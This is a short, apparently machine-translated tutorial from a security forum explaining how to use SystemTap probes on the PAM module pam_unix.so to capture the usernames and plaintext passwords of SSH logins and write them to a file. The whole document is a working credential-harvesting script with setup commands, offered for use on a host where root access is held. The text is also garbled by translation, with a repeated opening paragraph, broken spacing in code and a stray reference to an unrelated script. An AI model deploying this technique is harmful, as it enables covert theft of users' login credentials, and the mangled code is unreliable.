Systemtap is a very powerful kernel debugging tool that can debug many issues about the kernel layer. In Linux, the PAM module detects user information and authentication information to determine whether a user can log on to the system. With this knowledge point, use systemtap to capture the function calls of the dynamic library file pam_unix.so, obtain the user name and password used for ssh remote logon. Test Environment: CentOS6.432bit kernel version
Systemtap is a very powerful kernel debugging tool that can debug many issues about the kernel layer. In Linux, the PAM module detects user information and authentication information to determine whether a user can log on to the system. With this knowledge point, use systemtap to capture the function calls of the dynamic library file pam_unix.so, obtain the user name and password used for ssh remote logon.
Test Environment: CentOS6.4 32bit
Kernel version: 2.6.32-358. el6.i686
First install the following rpm Package
Yum -- releasever = 6.4 update
Yum install-y systemtap
Debuginfo-install $ (rpm-qf/lib/security/pam_unix.so)
Create a file and write the following code
Touch/root/capture_pass.stp
·#! /Usr/bin/stap
· Global username, pass, isSuccRet = 1;
· Probe process ("/lib/security/pam_unix.so"). function ("_ unix_verify_password ")
·{
· Username = user_string ($ name );
· Pass = user_string ($ p );
·}
· Probe process ("/lib/security/pam_unix.so"). function ("_ unix_verify_password"). return
·{
· If ($ return = 0)
·{
· Printf ("User: % s \ nPassword: % s \ n", username, pass );
· IsSuccRet = 0;
·}
·}
· Probe process ("/lib/security/pam_unix.so"). function ("pam_sm_open_session ")
·{
· If (isSuccRet! = 0)
·{
· Printf ("Login via ssh service. \ n \ User: % s \ nPassword: % s \ n", username, pass );
·}
· IsSuccRet = 1;
·}
Grant executable permissions
Chmod + x capture_pass.stp
Create a password record file
Touch password.txt
Execute the systemstap script
Stap capture_pass.stp-o password.txt
Execute the capture_pass.stp script locally and log on to the system remotely through ssh. even if the first logon fails, no error password is recorded. After success, the ctlw.c's script is run and password.txt is captured. Systemstap is a powerful tool, so it can only be used by a Super User.
From: https://forum.90sec.org